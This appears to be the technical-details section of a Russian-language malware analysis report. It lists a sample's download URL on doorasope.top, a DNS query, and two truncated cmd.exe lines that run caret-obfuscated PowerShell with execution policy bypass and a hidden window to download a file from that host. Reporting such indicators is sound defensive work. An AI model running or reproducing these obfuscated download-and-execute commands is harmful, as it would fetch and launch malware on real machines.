Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWE^rshelL.^E^Xe -E^X^Ec^UT^I^On^P^o^liCY ^bYPas^S^ -^N^oP^ROfIle^ ^-WiNdOwsty^lE^ ^HIDD^e^n^ (^N^E^w^-^Ob^jE^c^t S^ySTe^m.NeT^.weBcl^iEnT).^dOWNLo^adf^i^LE('http://www.door...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PoWE^rshelL.^E^Xe -E^X^Ec^UT^I^On^P^o^liCY ^bYPas^S^ -^N^oP^ROfIle^ ^-WiNdOwsty^lE^ ^HIDD^e^n^ (^N^E^w^-^Ob^jE^c^t S^ySTe^m.NeT^.weBcl^iEnT).^dOWNLo^adf^i^LE('http://www.door...' (со скрытым окном)